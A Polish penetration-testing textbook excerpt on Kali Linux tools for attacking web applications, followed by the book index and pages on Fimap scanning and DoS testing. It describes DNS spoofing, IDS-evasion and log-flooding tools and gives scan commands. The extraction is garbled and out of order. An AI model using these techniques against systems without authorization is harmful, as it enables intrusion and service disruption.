Inne narz dziaKali Linux oferuje inne narz dzia ktoacutere mo esz wykorzysta do przeprowadzania atakoacutew naaplikacje internetowe Poni ej zamieszczamy kroacutetkie zestawienie wybranych narz dzi ktoacuterenie by y do tej pory omawiane
DNSChef
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
267
Pakiet DNSChef to serwer DNS proxy przeznaczony dla pentesteroacutew i specjalistoacutew zajmuj -cych si analiz z o liwego oprogramowania Serwery DNS proxy to narz dzia bdquofa szuj cerdquoodpowiedzi DNS wykorzystywane do analizy ruchu sieciowego generowanego przez aplika-cje internetowe i wielu innych zastosowa DNS (ang Domain Name System) to rozproszonysystem przydzielania nazw zasoboacutew sieciowych takich jak komputery serwery us ugi siecio-we i inne zasoby sieciowe pod czone do internetu lub prywatnych sieci komputerowychCelowe dostarczanie fa szywych adresoacutew DNS mo e powodowa przekierowanie ruchu sie-ciowego do lokalizacji zupe nie innych ni oryginalne
Na przyk ad serwer DNS proxy mo e by wykorzystywany do utworzenia fa szywych odpo-wiedzi DNS powoduj cych e ruch dedykowany dla witryny CzarnyCharaktercom zamiastdo internetu b dzie trafia do lokalnego komputera analityka gdzie mo e by blokowany lubprzechwytywany w celu przeprowadzenia dok adniejszej analizy Aby to zrobi musisz uzy-ska dost p do jednego z serweroacutew DNS i odpowiednio zmodyfikowa wpisy DNS lub doko-na bdquozatruciardquo serwera DNS tak aby ruch sieciowy by przekierowywany do Twojego kom-putera z systemem Kali Linux Sama obs uga narz dzia DNSChef nie jest skomplikowanaaczkolwiek prawdziwym wyzwaniem mo e by atak na serwer DNS i przekierowanie ruchudo Twojego komputera
SniffJoke
SniffJoke pozwala na zupe nie przezroczyste przechwytywanie po cze TCP wprowadzaniedo nich opoacute nie modyfikowanie zawarto ci pakietoacutew oraz wstrzykiwanie fa szywych spre-parowanych pakietoacutew do sesji TCP u ytkownika Powoduje to e pasywne rozwi zania mo-nitoruj ce i zabezpieczaj ce ruch sieciowy takie jak systemy IDSIPS i sniffery maj du eproblemy z poprawn interpretacj po cze sieciowych Dzia anie programu wywo uje roacute -nice mi dzy ruchem sieciowym ktoacutery jest przechwytywany i przewidywany przez sniffera rzeczywistym ruchem sieciowym generowanym przez klienta w rezultacie czego algorytmybuduj ce bdquokonwersacjerdquo sieciowe dla sniffera maj problemy z poprawnym sk adaniem kolej-no ci pakietoacutew Na kolejnych dwoacutech rysunkach przedstawiamy proces przechwytywania ru-chu sieciowego mi dzy dwoma u ytkownikami bez udzia u pakietu SniffJoke oraz w sytuacjikiedy pakiet SniffJoke dzia a
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
268
SiegeSiege to narz dzie przeznaczone do testowania odporno ci na przeci enia po czeHTTPHTTPS pozwalaj ce deweloperom aplikacji internetowych na sprawdzanie zachowa-nia kodu aplikacji w skrajnych warunkach pracy Program Siege pozwala na wielow tkowegenerowanie sesji HTTP i analizowanie zachowania serweroacutew pod symulowanym obci eniemwielu u ytkownikoacutew Siege mo e pracowa w trybie regresji symulacji internetu oraz w trybiebrute-force
Aby uruchomi program Siege w systemie Kali Linux przejd do grupy Kali Linux i nast p-nie wykonaj polecenie Stress TestingNetwork Stress Testingsiege (zobacz pierwszy rysunekna nast pnej stronie)
Sk adnia wywo ania polecenia siege jest nast puj ca
siege [opcje] ltadres URL celugt
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
269
Rysunek przedstawiony poni ej przedstawia program Siege testuj cy witryn httpwwwthesecuritybloggercom Program domy lnie symuluje obci enie po czeniami od 15 u ytkow-
nikoacutew co zosta o przedstawione na rysunku poni ej Kiedy zatrzymasz dzia anie programuSiege generuje raport ktoacutery zosta zamieszczony na kolejnym rysunku
InundatorInundator to narz dzie pozwalaj ce na omijanie i neutralizowanie dzia ania systemoacutew IDS (angIntrusion Detection System) oraz IPS (ang Intrusion Protection System) poprzez bdquozalewanierdquo gene-rowanych przez nie dziennikoacutew spreparowanymi wpisami Koncepcja kryj ca si za takim rozwi -zaniem polega na tym e poprzez bdquozasypywanierdquo dziennikoacutew tysi cami fa szywie pozytywnych
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
270
wpisoacutew mo na ukry rzeczywisty atak ktoacutery staje si przez to potencjalnie bdquoniewidzialnyrdquo i ktoacutere-go poacute niejsza analiza ledcza jest mocno utrudniona Pakiet Inundator mo e by roacutewnie wy-korzystywany do testowania efektywno ci modu oacutew generuj cych alarmy w systemach SIEMczy IDSIPS
TCPReplayProgram TCPReplay wykorzystuje uprzednio przechwycony i zapisany w plikach w formacielibpcap ruch sieciowy do testowania dzia ania roacute nych urz dze sieciowych TCPReplay po-trafi rozpoznawa ruch generowany przez klienty i serwery modyfikowa nag oacutewki pakietoacutew2 3 i 4 warstwy oraz wstrzykiwa pakiety do sieci co pozwala na testowanie takich urz dze jakprze czniki routery zapory sieciowe czy systemy IDSIPS TCPReplay obs uguje roacute ne try-by pracy interfejsoacutew sieciowych
Moacutewi c w skroacutecie pakiet TCPReplay pozwala na przechwytywanie i zapisywanie ruchu sie-ciowego przesy anego mi dzy klientem a serwerem i nast pnie na retransmisj tego ruchu w do-wolnym czasie i miejscu w sieci
PodsumowanieOmawiane w tym rozdziale zagadnienia i oprogramowanie stanowi y dope nienie arsena utechnik i narz dzi ka dego pentestera aplikacji internetowych Po zako czeniu lektury powinieneju wiedzie jak zdobywa informacje o celach jak wyszukiwa podatno ci i luki w zabezpie-czeniach jak analizowa interakcje pomi dzy klientami a serwerami jak wykorzystywaexploity oraz luki w zabezpieczeniach oraz jak w razie potrzeby zak oacuteca dzia anie us ug interne-towych W tym i poprzednich rozdzia ach dokonali my kroacutetkiego przegl du narz dzi dost p-nych zaroacutewno w systemie Kali Linux jak i w internecie ktoacutere powinny si znale w arsenaleka dego specjalisty zajmuj cego si przeprowadzaniem testoacutew penetracyjnych Kali Linuxudost pnia wiele warto ciowych narz dzi aczkolwiek ka dy dobry pentester u ywa te w asnychskryptoacutew i programoacutew wykorzystuj cych luki typu Zero-Day Je eli chcesz by dobrym penteste-rem powiniene ustawicznie testowa nowe metody atakoacutew sprawdza roacute ne narz dzia penetra-cyjne i samodzielnie poszerza swoj wiedz na temat zagadnie omawianych w naszej ksi ce
W tym rozdziale omawiali my techniki b d ce niejako uwie czeniem ca ego procesu atako-wania aplikacji internetowych podczas przeprowadzania testoacutew penetracyjnych Poruszanetutaj by y zagadnienia zwi zane z prze amywaniem zabezpiecze aplikacji internetowychprzy u yciu atakoacutew na przegl darki atakoacutew z wykorzystaniem serweroacutew proxy oraz przechwyty-wania hase dost pu Rozdzia zako czyli my zagadnieniami zwi zanymi z zak oacutecaniem i przery-waniem dzia ania us ug sieciowych przy u yciu atakoacutew DoS oraz testowaniem odporno ciaplikacji i us ug sieciowych na prac w skrajnych warunkach obci enia
W nast pnym rozdziale zmienimy zupe nie front i wyja nimy jak przy u yciu narz dzi dost p-nych w systemie Kali Linux chroni aplikacje internetowe przed atakami pentesteroacutew i hakeroacutew
Kup książkę Poleć książkę
Skorowidz
Aacccheck 228Active Directory 171 194ADC 286 287adres URL definiowanie 254adresy IP sfa szowane 285aktualizacje 275
harmonogram 276zabezpiecze systemu 276
ALE 31analiza
bitowych obrazoacutew dyskoacutew 295list wyrazoacutew 189pakietoacutew sieciowych 206plikoacutew binarnych
zawieraj cychoprogramowanie firmware298
ruchu sieciowego 212s ownikoacutew 189sygnatur plikoacutew 299systemu plikoacutew 291 298zawarto ci plikoacutew indexdat
299zawarto ci plikoacutew PDF 299
da HTTP 203aplet Java 156aplikacje internetowe 23
b dy w zabezpieczeniach286
wykrywanie i mapowanie 241zakres testoacutew penetracyjnych
23Application Layer Attacks 257apt-get install httrack 66architektura klient-serwer 91ARO 31ARP 212
ARP address flooding 142ARP Spoofing 141arpspoof 141 212ataki
brute-force 125 170DDoS 256DoS 255hybrydowe 170LFI 254man-in-the-middle 139 211metod si ow 125na aplikacje internetowe 231na bazy danych 219 222na cele w internecie 250na klienty aplikacji
internetowych 147na parametry metod GET
i POST 131na protoko y komunikacyjne
256na serwery aplikacji
internetowych 92na serwery DNS 71na serwery WWW 231na warstw aplikacji 257na zarz dzanie sesjami 195na dania Form 131na dania HTTP 134powoduj ce wyczerpanie
zasoboacutew sesji 257przechwytywanie sesji 197RFI 254s ownikowe 169 228socjotechniczne 148 151
amanie hase 169SSL stripping 140SSL-Exhaustion 257THC-SSL-DOS 257
wykorzystuj ce przeci eniepo cze sieciowych 256
XSS 223 248z klonowaniem 151z u yciem narz dzi
penetracyjnych opartychna przegl darkach 236
audytbezpiecze stwa 21 28serweroacutew WWW 92sesji WWW 199 203warto 301
Authentication hijacking 225Autopsy 295AV 31
BBackTrack 38badanie zasoboacutew sieci
komputerowych 65bazy danych 218BeEF 232
panel zarz dzania pakietu 234przechwycony system 235
bezpiecze stwo sesji HTTP 281bezpiecze stwo systemu 272
a testy penetracyjne 32czynnik ludzki 148instalowanie oprogramowania
i urz dze 274podstawowe wymogi 273
bia e pude ko 24Binwalk 298bitowe kopie no nikoacutew danych
288 291narz dzia 293partycje 292suma kontrolna 294
Kup książkę Poleć książkę
Skorowidz
330
black-box 24 30BootKey 171 173Browser Exploitation
Framework 232brute-force 125 170
amanie hase 171bulk_extractor 300BURP 236BURP Proxy 238
Intercept 241opcje konfiguracyjne 239
Burp Spider 241 244Burp Suite 238
Ccs 139CAC 194Cain and Abel 173Center for Internet Security 275certyfikaty
CEH 311CISSP 31 193g oacutewnego urz du certyfikacji
106GPEN 311raport ko cowy 310SSL 106 282z podpisem w asnym 282
chkrootkit 295chntpw 180
uruchomienie w Kali Linux182
ciasteczka 197edytowanie zawarto ci 199
201niezabezpieczone 208obrona przed
przechwytywaniem 286przegl danie 201uwierzytelniaj ce ofiary 198wstrzykiwanie 198wykradanie 198 208 225zarz dzanie 200
ci g zaburzaj cy 170Cisco Network Foundation
Protection 275CISSP 193Clickjacking 196
kod roacuted owy stron 197obrona przed atakiem 287
CmosPwd 190
Cookie Cadger 203dane o sesji 204
Cookie Injector 200cookie injector tool 198cookies 197Cookies Manager+ 198 201COTS 231cracks per second 139Crackstation 278creddump 191cross-site scripting 223Crunch 169 185
znaki specjalne 186CutyCapt 327czarne pude ko 24
DDBPwAudit 229dc3dd 293 297dd 291DDoS 256
kategorie atakoacutew 256obrona przed atakiem 285
Debian 38Denial of Service 256dictstat 189Dig 71DirBuster 128
raport 130Distributed Denial of Service
256DNS 267DNSChef 266dokumentacja 306DoS 256
kategorie atakoacutew 256obrona przed atakiem 285
dost p do systemualternatywny 37techniki XSS 225
dost pno 30Dradis 325Driftnet 217dsniff 212
nas uchiwaniei przechwytywaniepakietoacutew 213
uruchamianie 214dual-boot configuration 44
EEDGAR 57EF 31ekspertyza ledcza 289e-mail relay server 124encrypted passwords 137Equifax Secure Certificate
Authority 282Ettercap 214
lista celoacutew 216skanowanie sieci 216
Exploitation Tools 36 37 48exploity 92 113
Reserve_TCP Meterpreter156
Ffa szywe
adresy IP 285odpowiedzi DNS 267witryny 159 252
Ferret 209uruchamianie 210
FHS 38Fierce 73Fimap 254findmyhash 190fingerprinting 93Firefox wtyczki 198 236Firesheep 199FOCA 84
utworzenie nowego projektu84
Foremost 299Forensics 48 290FoxyProxy 236fping 70funkcja skroacutetu 170
kopie no nikoacutew danych 288fuzzing aplikacji internetowych 93
Ggenerator
hase 278adunkoacutew 132
GHDB 63GIT 250glosariusz 319
Kup książkę Poleć książkę
Skorowidz
331
Google hacking 61Google Hacking Database 63Google Internet Authority 282GPU 177Greasemonkey 200grey-box 25 30gromadzenie danych 34GRUB 44Gruyere 224 246
instancja projektu 225
HHackBar 219Hak5 Pineapple 211Hamster 208Hardware Hacking 48hashcat 177hashed passwords 137Hash-identifier 188has a 137
dost pu 250generowanie listy 185amanie 169
ochrona 170polityka zarz dzania 277przechowywanie 278przechwytywanie 157 169
249si a 277w systemie Linux 173w systemie Windows 171
haszowanie 170z dodatkiem soli
kryptograficznej 170hexinject 228hiper cza spreparowane 196home feed option 163hosty skanowanie 162HTTrack 66 279Hydra 125
uruchomienie 128
IICMP Echo Request 70identyfikacja
adresoacutew URL 227celoacutew za pomoc serweroacutew
DNS 73obszaroacutew krytycznych 27typoacutew haszowanych warto ci
188
iFrame 196Information Gathering 34 46informatyka ledcza 287
zasady 288integralno 30intercept proxy 105interfejs p tli zwrotnej 239Inundator 269in ynieria
spo eczna 148wsteczna 48
ionCube Loader 64IP Forwarding 141IPSIDS 231iptables 142
Jj zyk SQL 218John the Ripper 137 173
domy lna konfiguracjacie ek 176
haszowanie 170amanie hase 174
proces 137amanie pliku hase 139
s owniki 138 177szybko dzia ania 138
Johnny 138amanie hase 174
opcje konfiguracyjneprogramu 175
s owniki 177uruchamianie 175
KKali Linux 15
aktualizacja pakietu SET 150instalowanie 40
pakietoacutew 43konfiguracja 39Live CD 180 290minimalne wymagania
sprz towe 40narz dzia dost pne
w systemie 46Network Install 40proces konfigurowania
partycji dysku 42publiczny adres IP 225s owniki 129
uruchamianiew maszynie wirtualnej 46w trybie Forensics 290z no nika zewn trznego 39
wprowadzenie do systemu 38karty dost pu 194KeepNote 326klienty 91 147
aplikacji internetowych 169191
HTTP 262klonowanie
rodowiska 278witryny internetowej 66 153
158 251 279klucze uruchamiania systemu
171 173komunikaty
ICMP 70o up ywie czasu dania 70
kopiowanie plikoacutew SAMi SYSTEM z hosta 172
LLinux amanie hase 173lista
adresoacutew URL 227potencjalnych hase 185
listener port 142Live HTTP Headers 134Local File Inclusion 254Logical Volume Manager 43LOIC 263
tryby 266luki w zabezpieczeniach
aktualizacja bazy 276aplikacji internetowych 245
254hostoacutew 167przegl darek 232raport ko cowy 315systemoacutew poczty
elektronicznej 123usuwanie 276wstrzykiwanie kodu SQL 221wstrzykiwanie skryptoacutew 223wykorzystywanie 113wyszukiwanie 92
LVM 43
Kup książkę Poleć książkę
Skorowidz
332
adunek 117amanie hase 137 169
bezp atne us ugi sieciowe190
haszowanych 189maska 189narz dzia 174przechowywanych w plikach
systemowych 169si owe 229systemu Linux 173techniki 169za pomoc John the Ripper
174zabezpieczaj cych BIOS
komputera 190cza modyfikacja 196
MMAC 172MagicTree 327Maintaining Access 38 48Maltego 58 74
zadania 76Maltego CaseFile 326man-in-the-middle 139 211
obrona przed atakiem 281przeprowadzanie manualne
212maska 189mechanizmy
HSTS 140klonowania 153obronne 231 271
testowanie 273pasywnego nas uchiwania 208renegocjacji bezpiecznego
po czenia SSL 257usuwania mi kkich b doacutew
404 93mened er LVM 43metadane 83
wyszukiwanie i analiza 83Metasploit 113 154
skanowanie sieci lokalnej 114wersja konsolowa 114
meterpreter 151uruchomienie sesji 156wykorzystanie 156
metodologiacertyfikacji CISSP 193testoacutew penetracyjnych 24
310 323metody
pojedynczegouwierzytelniania 194
szyfrowania 283mirror server 43MitM Proxy 161montowanie dyskoacutew z systemem
Windows 172
Nnag oacutewki X-Frame-Options 287narz dzia
do klonowania witryn 281do amania hase 174do przechwytywania sesji
198do przeprowadzania atakoacutew
DoSDDoS 285ledcze 295
wspomagaj ce tworzenieraportoacutew 325
nas uchiwaniepakietoacutew sieciowych 199ruchu sieciowego 143 228
nazwy DNS 71Nessus 162
HomeFeed 163instalowanie w systemie
Kali Linux 163ProfessionalFeed 163raporty 167 168skanowanie hostoacutew 166uruchomienie 164u ywanie 164
Netcat 124NetFlow 286NGIPS 236Niskoorbitalne Dzia o Jonowe
263Nmap 76
agresywne skanowanie 79graficzny interfejs
u ytkownika 77okno wynikoacutew skanowania 82opcje 79
NoScript 287no niki danych 288
Oobrona przed atakami
Clickjacking 287DoS 285man-in-the-middle 281przechwytywanie ciasteczek
286SSLstrip 284
ocena ryzyka 30formu y 31okna serwisowe 277
ocl 178oclHashcat 177odgadywanie hase 169okna serwisowe 277Ophcrack 183
uruchomienie w Kali Linux184
osobista weryfikacja to samo ci194
oszacowanie bezpiecze stwa 21o wiadczenie o zachowaniu
poufno ci 307otwarta implementacja sterownikoacutew
kart graficznych 178Owasp-Zap 105 245
automatyczne logowanie 110konfigurowanie przegl darki
108mechanizm aktualizacji ca ego
pakietu 110proces uwierzytelniania 109przeprowadzanie atakoacutew 109raporty 111
PPAE 39pakiety
ARP 212czas ycia 259MitM Proxy 161SET 149 249sieciowe 259TCP 259
pami masowa urz dze 289partycje 172
wymiany 291Pasco 299Password Attacks 37 47 174Patator 229
Kup książkę Poleć książkę
Skorowidz
333
pdf-parser 299pentesterzy 15phishing email 159phrasendrescher 190PIV 194pliki
binarne 298CLF 227indexdat 299Robotstxt 53SAM 171 178 180
wydobycie zawarto ci 173SEED 247shadow 173strefowe 71wyszukiwanie i odzyskiwanie
299poczta elektroniczna 123
fa szywe wiadomo ci 159podatno na atak 29
aktualizacja bazy 276aplikacji internetowych 245
254ocena ryzyka 30przegl darki 232raport ko cowy 315skanowanie 30usuwanie 276wyszukiwanie 92XSS 223 226
podnoszenie uprawnie 37podstawowe wymogi
bezpiecze stwa 303podsumowanie ustale 313polecenia
apt-get install 233apt-get update 233arpspoof 142binwalk 298bkhive 173bkhive SYSTEM bootkey 180bkreg 173chntpw -i 183chntpw -l SAM 181cp 139Data 124db_nmap 115dc3dd 293expand 171exploit 119fdisk 172fierce 123fping 70
getsystem 222git 150HELO 124host 114ifconfig 140ifdown 140iptables 141 142john -test 138MAIL FROM 124md5sum 297msfcli 113msfconsole 113msfgui 113netcat 124ping 70protoko u SMTP 124RCPT TO 124route -n 141samdump 173samdump SAM bootkey 180services 114 115sessions -I 1 157set payload 117sfdisk -l 291sha256sum 294show options 117 118show payloads 117sqlmap 222SYSKEY 173traceroute 69use 116
polityka zarz dzania has ami 277po czenia
HTTP 268HTTPS 268
po czeniaTCP 267troacutejetapowe 79VPN 282
poprawki zabezpiecze 275harmonogram instalowania 276proces zarz dzania 276
porty443 1198080 108 245komunikacyjne 118nas uchuj ce 142
poufno 30poziom zabezpiecze
minimalny 274podstawowy 274
PREROUTING 143
Privilege Escalation 37produkty z poacute ki 231professional feed option 163projekty
Emily 59Gruyere 224 246
promiscuous mode 47Protocol Attacks 256protoko y
8021x 283HTTPS 282MACsec 283routingu 285SSL 257SSLTLS 30 281 286TLS 281
ProxyStrike 98robot sieciowy 100
przechwytywanieciasteczek 197 209 286danych logowania
u ytkownikoacutew 211hase 169 249nazw kont i hase 157obrazoacutew przesy anych
w sieci 217pakietoacutew 213
sieciowych 210TCP 259
przechwytywaniepo cze 161
TCP 267ruchu HTTP oraz HTTPS 238ruchu sieciowego 207 267
270sesji 197 208 233
narz dzia 198przegl d projektu 306przegl darki 232
ochrona przed atakami 236zabezpieczenia 249
przekazywanie pakietoacutew IP 142212
przekierowaniepo cze 284portoacutew komunikacyjnych
142ruchu sieciowego 141sesji 284
przestrze celoacutew 27przetwarzanie wielow tkowe 262PwDump 173
Kup książkę Poleć książkę
Skorowidz
334
RRainbow Tables 47 170RainbowCrack 170 189ramy czasowe 308raport ko cowy
b dy 302dodatki 319dokumentacja 306format 307glosariusz 319informacje o metodologii 310konsekwencje 302narz dzia wspomagaj ce
tworzenie 325o wiadczenie o zachowaniu
poufno ci 307podatno ci i luki
w zabezpieczeniach 315podsumowanie ustale 313
zestawienie elementoacutew 315prezentacja 302przegl d projektu 306ramy czasowe projektu 308specyfikacja 28streszczenie 309strona tytu owa 307szczegoacute owe procedury
testowania 312tworzenie 301us ugi profesjonalne 304wersja ko cowa 306wersja robocza 306wnioski i rekomendacje
dla rodowiska sieciowego316
wymagania 303wype nianie szablonu 306zakres projektu 306zarz dzanie wersjami
dokumentacji 308zgodno ze standardami
i procedurami 303rcracki_mt 189Regional Internet Registries 57rekomendacje 316
powykonawcze 28rekonesans 34 51
badanie zasoboacutew siecikomputerowych 65
Google hacking 61
Google Hacking Database 63lokalizacja 60oferty pracy 59plik Robotstxt 53regionalni administratorzy
adresoacutew IP 57rozpoznanie wst pne 53sieciowy 65strona internetowa firmy 53system EDGAR 57wyszukiwarka Shodan 60z wykorzystaniem protoko u
ICMP 69z wykorzystaniem serweroacutew
DNS 71zadania 52zasoby serwisoacutew
spo eczno ciowych 58zaufanie 59roacuted a przechowuj cehistoryczne wersje witryninternetowych 54
rekordy zasobowe 71Remote File Inclusion 254renegocjacja sesji SSL 258Reporting Tools 48Reverse Engineering 48rich-text 326robot sieciowy 93 100 241roczna oczekiwana strata 31roczny wska nik wyst pienia
zdarzenia 31rootkit 295rozsy anie spreparowanych
pakietoacutew ARP 141rozszerzenia PAE 39ruch sieciowy 206
adresy URL 227man-in-the-middle 212monitorowanie 227nas uchiwanie 143 228przechwytywanie 267 270przekierowanie 213sprawdzanie ilo ci 263urz dzenia monitoruj ce 285
SSAM 171samdump2 178Scalpel 299
Scapy 257 259scenariusze atakoacutew 260
security assessment 21security audit 21serwery 91
aplikacji internetowych 92223zabezpieczanie 136 249
atakowanie 262limit roacutewnoleg ych sesji 262poczty elektronicznej 123proxy 98 105 236
wykorzystanie 238Samba 116sieciowe 91WWW 262
serwery DNSidentyfikacja celoacutew 73proxy 267rekonesans 71
serwisy spo eczno ciowe 58sesja 195
ciasteczka 197logowania 205mechanizmy bezpiecze stwa
195Session Exhaustion 257session fixation attack 195session hijacking 197SET 149 249
adres IP sklonowanej witryny158
aplet Java 156Credential Harvester Attacks
157Exploit to deliver 154importowanie w asnych
plikoacutew witrynyinternetowej 158
IP addresshostname forreverse connection 154
mechanizmy chroni ceprzeprowadzany atak 155
NATPort forwarding 154przechwycenie nazw kont
i hase 157raport o zdarzeniu 160raporty 253rozsy anie fa szywych
wiadomo ci 159URL you want to clone 154
Kup książkę Poleć książkę
Skorowidz
335
uruchomienie 151utworzenie kopii witryny 153zastosowanie do ataku
z klonowaniem 151SharePoint 151Shodan 60Sidejacking 208Siege 268skanery
biometryczne 194stron internetowych 246
skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u
ICMP 70Skipfish 95
raport 97s owniki 96
skryptyopakowuj ce 228wykrywanie
nieautoryzowanychskryptoacutew 287
XSS 224 226SLE 31Slowloris 261s owa kluczowe
dbs 222FUZZ 133 135tables 222
sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata
31sqlmap 221SSL stripping 140SSLstrip 140 197 211
konfigurowanieprzekierowania portoacutew 142
mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141
SSO 194
standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293
baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy
BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia
i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231
szablony witryn 251szare pude ko 24szyfrowane po czenia
https 197VPN 282
Ttablice t czowe 170 189
amanie hase systemuWindows 183
Tamper Data 125TCPReplay 270Tenable 163testowanie
dzia ania roacute nych urz dzesieciowych 270
mechanizmoacutew obronnych 273odporno ci na przeci enia
268podatno ci na ataki XSS 224sklonowanego rodowiska
279testy
o nieograniczonym zakresiedzia ania 26
odporno ci na przeci eniesystemu 256
warunkoacutew skrajnych 256
testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu
zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu
Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33
THX-SSL-DOS 257tokeny 194
sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259
Uumowy
oczekiwania klienta 317potencjalne problemy
i zagadnienia 324rozliczane wed ug zu ycia
czasu i zasoboacutew 305wykaz prac 319ze sta cen 304
unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi
NAT 251profesjonalne 304w chmurze 211
usuwanie ladoacutew w amania 38utrzymanie zdobytego
przyczoacute ka 37uwierzytelnianie 193
ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193
Kup książkę Poleć książkę
Skorowidz
336
VVega 101
modu serwera proxy 104zestawienie znalezionych
podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32
Ww3af 120
wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122
w3mir 281warto
ryzyka 32sumy kontrolnej 293zasobu 31
WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92
obs uga programu 93raport 95
WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132
Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171
ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie
plikoacutew 172partycja systemu 172uzyskanie dost pu do
systemu 180Windows Reverse_TCP
Meterpreter 154Wireless Attacks 47Wireshark 206
filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie
ciasteczek 198kodu 248
kodu SQL 218pakietoacutew 228skryptoacutew 223
wtyczki przegl darki Firefox 198wykaz prac
dodatkowe elementy 323dodatkowe uzgodnienia
prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania
i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy
penetracyjne 321wykorzystywanie
b doacutew w zabezpieczeniachprzegl darki 196
exploitoacutew 92luk w zabezpieczeniach 113
254systemoacutew poczty
elektronicznej 123zidentyfikowanych
podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie
luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92
wytyczne 28 304
XXSS 223
aplikacje internetowe 248testowanie podatno ci 224
XSS cookie stealing 225
Zzabezpieczanie
serweroacutew aplikacjiinternetowych 249
systemoacutew pod czonychdo internetu 271
zakres prac 319cel testu 33definicja
przestrzeni celoacutew 27systemoacutew 26
zdobycia flagi 28dokument 25identyfikacja obszaroacutew
krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o
planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby
prze amywaniazabezpiecze 27
rekomendacjepowykonawcze 28
specyfikacja raportuko cowego 28
ZAP 236 245obrona przed zdalnymi
atakami 249Zaproxy 105zarz dzanie
aktualizacjami 275poprawkami zabezpiecze
275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308
zasoby sieciowe odpornona przeci enie 263
zatarcie ladoacutew penetracji systemu38
zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125
Host details 81Zero-day 275zewn trzny dysk USB 292zmienne
LHOST 118RHOST 117
znaczniki czasu 172zrzut okna 327
daniaForm 131mapowanie 24
Kup książkę Poleć książkę
Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW
255
ale roacutewnie dobrze mo esz u y innych metod takich jak zbieranie wszystkich adresoacutew URLz hiper czy zamieszczonych na danej stronie internetowej czy pozyskiwanie adresoacutew URL z for-mularzy i nag oacutewkoacutew stron W naszym przypadku celem skanera b dzie witryna httpwwwthesecuritybloggercom
Aby uruchomi skanowanie witryny httpwwwthesecuritybloggercom powiniene wpisanast puj ce polecenie
fimap -u httpwwwthesecuritybloggercom
Pakiet Fimap rozpocznie skanowanie i sproacutebuje automatycznie wykry podatno ci na atakitypu LFIRFI Na rysunku przedstawionym poni ej wida jednak e witryna wwwthesecurity
bloggercom jest odporna na tego typu ataki
Ataki typu DoSW zdecydowanej wi kszo ci przypadkoacutew celem przeprowadzania testoacutew penetracyjnych jestidentyfikacja potencjalnych i rzeczywistych podatno ci i luk w zabezpieczeniach bez umy l-nego zak oacutecania dzia ania atakowanego systemu i bez robienia mu krzywdy w jakikolwiek in-ny sposoacuteb Jest to kluczowy element odroacute niaj cy autoryzowanego pentestera od z o liwegonapastnika maj cego niecne zamiary Prawdziwy napastnik nie przestrzega adnych regu
Kup książkę Poleć książkę
Kali Linux Testy penetracyjne
256
i nie zwraca uwagi na to czy jego dzia ania spowoduj zak oacutecenia w funkcjonowaniu atako-wanego systemu je eli tylko takie post powanie b dzie dla niego korzystne Czasami zdarzasi nawet e napastnik b dzie wr cz za wszelk cen szuka mo liwo ci zak oacutecenia dzia aniaczy nawet ca kowitego wy czenia atakowanego systemu Z tego powodu w niektoacuterych przypad-kach przeprowadzenie testoacutew odporno ci danej witryny czy aplikacji internetowej na ataki typuDoS (ang Denial of Service) mo e by bardzo po dane Testy tego rodzaju cz sto s nazywanetestami warunkoacutew skrajnych lub testami odporno ci na przeci enie systemu (ang stress testing)
Jedn z najwa niejszych spraw zwi zanych z testami odporno ci na ataki typu DoS jest bezwzgl dne uzyska-nie pisemnej zgody w a ciciela systemu na przeprowadzanie takich atakoacutew Niektoacutere metody atakoacutewmog mie negatywny wp yw na funkcjonowanie systemu nawet po zako czeniu testoacutew Dobrym roz-wi zaniem jest przeprowadzanie takich testoacutew na systemach z redundancj systemach nieprodukcyj-nych czy systemach zainstalowanych w rodowisku laboratoryjnym o ile to oczywi cie mo liwe
